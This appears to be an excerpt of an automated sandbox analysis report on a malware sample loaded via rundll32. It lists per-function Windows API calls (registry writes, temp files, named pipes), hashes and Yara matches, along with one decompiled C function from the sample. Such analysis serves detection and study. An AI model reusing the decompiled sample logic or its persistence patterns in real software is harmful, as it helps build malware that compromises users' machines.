                            • HeapFree.KERNEL32(00000000,?), ref: 04F7E3B5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                            • String ID:
                            • API String ID: 773763258-0
                            • Opcode ID: 990c7fdcfd07a333d11f6b1ed7d40115db3f6975631bd61e55baa2d7dcb0baed
                            • Instruction ID: 51898b8b2a1a09d61d028166e06ff604dc4729a5dbaea3e4442802eccb161e98
                            • Opcode Fuzzy Hash: 990c7fdcfd07a333d11f6b1ed7d40115db3f6975631bd61e55baa2d7dcb0baed
                            • Instruction Fuzzy Hash: 7A71E571D00219EFDB11DFA5EC84DAEBBB9FF09314F04405AE605AB220D738A956EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04F65226
                            • memcpy.NTDLL(?,?,00000010), ref: 04F65249
                            • memset.NTDLL ref: 04F65295
                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 04F652A9
                            • GetLastError.KERNEL32 ref: 04F652D7
                            • GetLastError.KERNEL32 ref: 04F6531E
                            • GetLastError.KERNEL32 ref: 04F6533D
                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 04F65377
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F65385
                            • GetLastError.KERNEL32 ref: 04F65408
                            • ReleaseMutex.KERNEL32(?), ref: 04F6541A
                            • RtlExitUserThread.NTDLL(?), ref: 04F65430
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                            • String ID:
                            • API String ID: 4037736292-0
                            • Opcode ID: bb39ac55b2858f03dc819e7f1d7ce441cb0330a66c3d46c347b03888d56b4a82
                            • Instruction ID: 5a620bdf2016709922d812da25fcfc8fbd0169c8df59c6cb87b8bfe2c5de522e
                            • Opcode Fuzzy Hash: bb39ac55b2858f03dc819e7f1d7ce441cb0330a66c3d46c347b03888d56b4a82
                            • Instruction Fuzzy Hash: 95618E71904705BFD7209F25EC49A2BBBE9FF84B10F40991DF596E6180E7B4E8068B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,761B5520,?,00000000,?,?,?), ref: 04F6DA0C
                            • lstrlen.KERNEL32(?), ref: 04F6DA14
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6DA43
                            • lstrlen.KERNEL32(?), ref: 04F6DA58
                            • lstrlen.KERNEL32(?), ref: 04F6DA66
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 04F6DAB4
                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04F6DAD8
                            • lstrlen.KERNEL32(?), ref: 04F6DB0B
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6DB36
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04F6DB4D
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6DB5A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                            • String ID:
                            • API String ID: 904523553-0
                            • Opcode ID: 3c6bbbcc2a294afe9342db2e1069650cbe8b05826295e650c2e1c5e6a7bcf981
                            • Instruction ID: 6c6d494332ae04ee0266de0ca5bbad7ea86cf09c71962db9c0212c6b0e08527f
                            • Opcode Fuzzy Hash: 3c6bbbcc2a294afe9342db2e1069650cbe8b05826295e650c2e1c5e6a7bcf981
                            • Instruction Fuzzy Hash: 69416971A0024ABFDF118FA0DC40AAE7BB9FF84310F10806AF916AB150D734E912EB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04F7201B
                            • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 04F7203D
                            • ConnectNamedPipe.KERNEL32(?,?), ref: 04F7205D
                            • GetLastError.KERNEL32 ref: 04F72067
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F7208B
                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 04F720CE
                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04F720D7
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F720E0
                            • CloseHandle.KERNEL32(?), ref: 04F720F5
                            • GetLastError.KERNEL32 ref: 04F72102
                            • CloseHandle.KERNEL32(?), ref: 04F7210F
                            • RtlExitUserThread.NTDLL(000000FF), ref: 04F72125
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                            • String ID:
                            • API String ID: 4053378866-0
                            • Opcode ID: fe90f63fb7febcce0cac6f89d96ee4ec8d59e4b04923bea623142c3a50dcffc4
                            • Instruction ID: ec48ed824bb546c6e4b7f010d54a97009de52edc7d1ae2b0eab4db54bf9ebdff
                            • Opcode Fuzzy Hash: fe90f63fb7febcce0cac6f89d96ee4ec8d59e4b04923bea623142c3a50dcffc4
                            • Instruction Fuzzy Hash: 9331B370404709BFE7109F24EC4896FBBA9FF44314F110A2EF561D6090D778AE46CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlImageNtHeader.NTDLL(?), ref: 04F74151
                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04F709CF,00000094,00000000,00000000,?), ref: 04F74169
                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04F74178
                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04F709CF,00000094,00000000,00000000,?), ref: 04F7418B
                            • GetTickCount.KERNEL32 ref: 04F7418F
                            • wsprintfA.USER32 ref: 04F741A6
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F741E1
                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04F74201
                            • lstrlen.KERNEL32(00000000), ref: 04F7420B
                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 04F7421B
                            • RegCloseKey.ADVAPI32(?), ref: 04F74227
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 04F74235
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                            • String ID:
                            • API String ID: 3778301466-0
                            • Opcode ID: 26949cff4ec4a1f0dd5cd71e371879a3f8c3a342fe0a538f5ea8722f5006fc34
                            • Instruction ID: f3a085172360280cdf1543e647f2360d834b051efdaf2691f6cbbb9d02d377ff
                            • Opcode Fuzzy Hash: 26949cff4ec4a1f0dd5cd71e371879a3f8c3a342fe0a538f5ea8722f5006fc34
                            • Instruction Fuzzy Hash: 2E3129B1900119FFDB119FA4EC88DBF7BACEF45359B00406AFA05DB100D6789E55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F650BD
                            • GetCurrentThreadId.KERNEL32 ref: 04F650D3
                            • GetCurrentThread.KERNEL32 ref: 04F650E4
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                              • Part of subcall function 04F80551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,761B5520,00000000,?,04F6512E,00000020,00000000,?,00000000), ref: 04F805BC
                              • Part of subcall function 04F80551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,761B5520,00000000,?,04F6512E,00000020,00000000,?,00000000), ref: 04F805E4
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 04F6515E
                            • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 04F6516A
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F651B9
                            • wsprintfA.USER32 ref: 04F651D1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F651DC
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F651F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                            • String ID: W
                            • API String ID: 630447368-655174618
                            • Opcode ID: acb4174864d965d4cee7ab8a0111f20a2802fe744301fe0f67c436dda56b9851
                            • Instruction ID: a3c2448ce4c1239abfc0c3400d141454633ead9584cc3ff7f5accbb1c068139f
                            • Opcode Fuzzy Hash: acb4174864d965d4cee7ab8a0111f20a2802fe744301fe0f67c436dda56b9851
                            • Instruction Fuzzy Hash: 4A415071900119FFDF129FA1EC48DAE7FB9FF45748B04401AF905AA110D738AA56EFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F7B82F
                              • Part of subcall function 04F7447B: RegCloseKey.ADVAPI32(?,?), ref: 04F74502
                            • RegOpenKeyA.ADVAPI32(80000001,04F74833,?), ref: 04F7B86A
                            • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 04F7B8CC
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F7B8E1
                            • lstrcpyW.KERNEL32(?), ref: 04F7B8FB
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F7B90A
                              • Part of subcall function 04F7452B: lstrlenW.KERNEL32(?,?,?,04F6E51D,?,?,?,?,00001000,?,?,00001000), ref: 04F7453E
                              • Part of subcall function 04F7452B: lstrlen.KERNEL32(?,?,04F6E51D,?,?,?,?,00001000,?,?,00001000), ref: 04F74549
                              • Part of subcall function 04F7452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04F7455E
                            • RegCloseKey.ADVAPI32(04F74833,?,?,04F74833), ref: 04F7B974
                              • Part of subcall function 04F6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2B6
                              • Part of subcall function 04F6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2DE
                              • Part of subcall function 04F6C2AA: memset.NTDLL ref: 04F6C2F0
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,04F74833), ref: 04F7B9A9
                            • GetLastError.KERNEL32(?,?,04F74833), ref: 04F7B9B4
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F74833), ref: 04F7B9CA
                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,04F74833), ref: 04F7B9DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                            • String ID:
                            • API String ID: 1430934453-0
                            • Opcode ID: 1b816aa1cf2767555d60c8ab65dde50bf741af56c1b694c73be6d1ed30338d1d
                            • Instruction ID: 70a916302f3c064421259de90d86c5c46229e8f1e1968d093c0f9b072cf727b8
                            • Opcode Fuzzy Hash: 1b816aa1cf2767555d60c8ab65dde50bf741af56c1b694c73be6d1ed30338d1d
                            • Instruction Fuzzy Hash: 65513C72900119FBDB119FA4EC44EBE7BB9EF49348B10405AF951AB151D739FE02DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 55%
                            			E04A162F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				WCHAR* _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				void* __edi;
                            				void* __esi;
                            				WCHAR* _t58;
                            				signed int _t60;
                            				signed int _t62;
                            				intOrPtr _t64;
                            				intOrPtr _t66;
                            				intOrPtr _t70;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            				WCHAR* _t80;
                            				WCHAR* _t83;
                            				void* _t84;
                            				void* _t85;
                            				void* _t86;
                            				intOrPtr _t92;
                            				signed int _t103;
                            				void* _t104;
                            				intOrPtr _t105;
                            				void* _t107;
                            				intOrPtr* _t115;
                            				void* _t119;
                            				WCHAR* _t125;
                            
                            				_t58 =  *0x4a1a3dc; // 0x5539c18
                            				_v24 = _t58;
                            				_v28 = 8;
                            				_v20 = GetTickCount();
                            				_t60 = E04A17367();
                            				_t103 = 5;
                            				_t98 = _t60 % _t103 + 6;
                            				_t62 = E04A17367();
                            				_t117 = _t62 % _t103 + 6;
                            				_v32 = _t62 % _t103 + 6;
                            				_t64 = E04A1117A(_t60 % _t103 + 6);
                            				_v16 = _t64;
                            				if(_t64 != 0) {
                            					_t66 = E04A1117A(_t117);
                            					_v12 = _t66;
                            					if(_t66 != 0) {
                            						_push(5);
                            						_t104 = 0xa;
                            						_t119 = E04A167E7(_t104,  &_v20);
                            						if(_t119 == 0) {
                            							_t119 = 0x4a1918c;
                            						}
                            						_t70 = E04A1659E(_v24);
                            						_v8 = _t70;
                            						if(_t70 != 0) {
                            							_t115 = __imp__;
                            							_t72 =  *_t115(_t119);
                            							_t75 =  *_t115(_v8);
                            							_t76 =  *_t115(_a4);
                            							_t80 = E04A16D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                            							_v24 = _t80;
                            							if(_t80 != 0) {
                            								_t105 =  *0x4a1a348; // 0xb1d5a8
                            								_t28 = _t105 + 0x4a1bb30; // 0x530025
                            								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                            								_push(4);
                            								_t107 = 5;
                            								_t83 = E04A167E7(_t107,  &_v20);
                            								_a8 = _t83;
                            								if(_t83 == 0) {
                            									_a8 = 0x4a19190;
                            								}
                            								_t84 =  *_t115(_a8);
                            								_t85 =  *_t115(_v8);
                            								_t86 =  *_t115(_a4);
                            								_t125 = E04A16D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                            								if(_t125 == 0) {
                            									E04A16C2C(_v24);
                            								} else {
                            									_t92 =  *0x4a1a348; // 0xb1d5a8
                            									_t44 = _t92 + 0x4a1bca8; // 0x73006d
                            									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                            									 *_a16 = _v24;
                            									_v28 = _v28 & 0x00000000;
                            									 *_a20 = _t125;
                            								}
                            							}
                            							E04A16C2C(_v8);
                            						}
                            						E04A16C2C(_v12);
                            					}
                            					E04A16C2C(_v16);
                            				}
                            				return _v28;
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 04A1630E
                            • lstrlen.KERNEL32(00000000,00000005), ref: 04A1638F
                            • lstrlen.KERNEL32(?), ref: 04A163A0
                            • lstrlen.KERNEL32(00000000), ref: 04A163A7
                            • lstrlenW.KERNEL32(80000002), ref: 04A163AE
                            • wsprintfW.USER32 ref: 04A163F4
                            • lstrlen.KERNEL32(?,00000004), ref: 04A16417
                            • lstrlen.KERNEL32(?), ref: 04A16420
                            • lstrlen.KERNEL32(?), ref: 04A16427
                            • lstrlenW.KERNEL32(?), ref: 04A1642E
                            • wsprintfW.USER32 ref: 04A16465
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: 33bb52589c1e4d6fc20da14e519ae781c2c57eae41fb7612c1c0ab6b9a97c65a
                            • Instruction ID: 1025926730d885913a24c56b9e9880dd6c3aa2249748214d709c495e1e9c954d
                            • Opcode Fuzzy Hash: 33bb52589c1e4d6fc20da14e519ae781c2c57eae41fb7612c1c0ab6b9a97c65a
                            • Instruction Fuzzy Hash: B3516D72D00219ABDF12AFA4DD44EDE7BB6EF48314F058065F904A7270DB35EA11DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04F75389
                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04F7539E
                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04F753C6
                            • HeapFree.KERNEL32(00000000,?), ref: 04F75407
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F75417
                            • RtlAllocateHeap.NTDLL(00000000,04F6DA9D), ref: 04F7542A
                            • RtlAllocateHeap.NTDLL(00000000,04F6DA9D), ref: 04F75439
                            • HeapFree.KERNEL32(00000000,00000000,?,04F6DA9D,00000000,?,?,?), ref: 04F75483
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?,?), ref: 04F754A7
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?), ref: 04F754CC
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?), ref: 04F754E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$CloseCreate
                            • String ID:
                            • API String ID: 4126010716-0
                            • Opcode ID: 329038ae3fc029b95148092207631ad9cb9ed4baecfe2090103abb0574559627
                            • Instruction ID: 3dd9181f6d77cd17a82f2683f4cbcfc65fd2c6026d722e97d5fa03dfe1c26432
                            • Opcode Fuzzy Hash: 329038ae3fc029b95148092207631ad9cb9ed4baecfe2090103abb0574559627
                            • Instruction Fuzzy Hash: A3519EB5D0021DFFDF019F94E8848EEBBB9FB08315F10546AE915A6120D3399E95EF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F6CEDD
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F6CEF3
                            • lstrlenW.KERNEL32(00000000), ref: 04F6CF36
                            • RtlAllocateHeap.NTDLL(00000000,04F8350B), ref: 04F6CF4C
                            • memcpy.NTDLL(00000000,00000000,04F83509), ref: 04F6CF5F
                            • _wcsupr.NTDLL ref: 04F6CF6B
                            • lstrlenW.KERNEL32(?,04F83509), ref: 04F6CFA4
                            • RtlAllocateHeap.NTDLL(00000000,?,04F83509), ref: 04F6CFB9
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6CFCF
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F6CFF5
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6D004
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                            • String ID:
                            • API String ID: 3868788785-0
                            • Opcode ID: ad9d13094934d4b5a5f77758915d843c44a1d3b7aa126c1eff968700258df7fc
                            • Instruction ID: 6f916ab0937c1ef2e25b01e6b1b28d26be8435e26f1cdd8ca7ee74ae90d860e5
                            • Opcode Fuzzy Hash: ad9d13094934d4b5a5f77758915d843c44a1d3b7aa126c1eff968700258df7fc
                            • Instruction Fuzzy Hash: DC31F332A00259BFC7205F74BC8893F77A8EB89710B14051EFAA7DB145DB75BC068BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F6163E
                              • Part of subcall function 04F7447B: RegCloseKey.ADVAPI32(?,?), ref: 04F74502
                            • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 04F6166D
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 04F6167E
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F616B8
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 04F616DA
                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 04F616E3
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F616F9
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 04F6170E
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F61722
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 04F61737
                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 04F61740
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                            • String ID:
                            • API String ID: 534682438-0
                            • Opcode ID: d85df38c03ff6c1e9055a7670a21b71d67f957c871dc1161ba43c5a80a9acc85
                            • Instruction ID: 76be7692ad9f0253f335ece35770fdeea4364a00c4f8be85f870a8ec0480a598
                            • Opcode Fuzzy Hash: d85df38c03ff6c1e9055a7670a21b71d67f957c871dc1161ba43c5a80a9acc85
                            • Instruction Fuzzy Hash: 0C314A75900108FFCB129FA4FC88CBE7BB9FB48344B144059F606EA010D37A9E46EB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04F733E4
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F733F6
                            • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F73403
                            • wsprintfA.USER32 ref: 04F7341E
                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,04F6C1F8,00000000,00000094,00000000), ref: 04F73434
                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04F7344D
                            • WriteFile.KERNEL32(00000000,00000000), ref: 04F73455
                            • GetLastError.KERNEL32 ref: 04F73463
                            • CloseHandle.KERNEL32(00000000), ref: 04F7346C
                            • GetLastError.KERNEL32(?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094,00000000), ref: 04F7347D
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F7348D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                            • String ID:
                            • API String ID: 3873609385-0
                            • Opcode ID: e322e37dae23c43837d1a2e2eda919a58b331382f327ddd401fc91d6d85f98ee
                            • Instruction ID: f7e6cb79f3f09cda20f610fc0697546feb6ca2648566ab802a282d23d765ea08
                            • Opcode Fuzzy Hash: e322e37dae23c43837d1a2e2eda919a58b331382f327ddd401fc91d6d85f98ee
                            • Instruction Fuzzy Hash: 3D11757264025DBFE3122EA4BC8CE7B3B9CEB46665B00002EFD46DA140DA5D5D46E6B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(00000000,0000002C,76ECD3B0,00000000,761B5520,7620F710), ref: 04F68030
                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 04F68043
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F68066
                            • StrTrimA.SHLWAPI(00000001,?), ref: 04F68075
                            • lstrlen.KERNEL32(00000000), ref: 04F680AA
                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04F680BD
                            • lstrcpy.KERNEL32(00000004,00000000), ref: 04F680DB
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F680FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                            • String ID: W
                            • API String ID: 1974185407-655174618
                            • Opcode ID: d7496499bbf4fc6574571aa4605159833747c552bf492a78f91ac2d7d04d5477
                            • Instruction ID: a328161c9027e58ff70c11d8cc9e12265dde4f05773812fd0249ef42908f60aa
                            • Opcode Fuzzy Hash: d7496499bbf4fc6574571aa4605159833747c552bf492a78f91ac2d7d04d5477
                            • Instruction Fuzzy Hash: 0D314075901219FFDB11AF68EC44EAA7BB9EF09780F15405EF9059B200E678AD42DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(0631CBB8,00000000,00000000,00000000,?), ref: 04F73CBA
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CC9
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CD6
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 04F73CEE
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CFA
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F73D16
                            • wsprintfA.USER32 ref: 04F73DF8
                            • memcpy.NTDLL(00000000,00004000,?), ref: 04F73E45
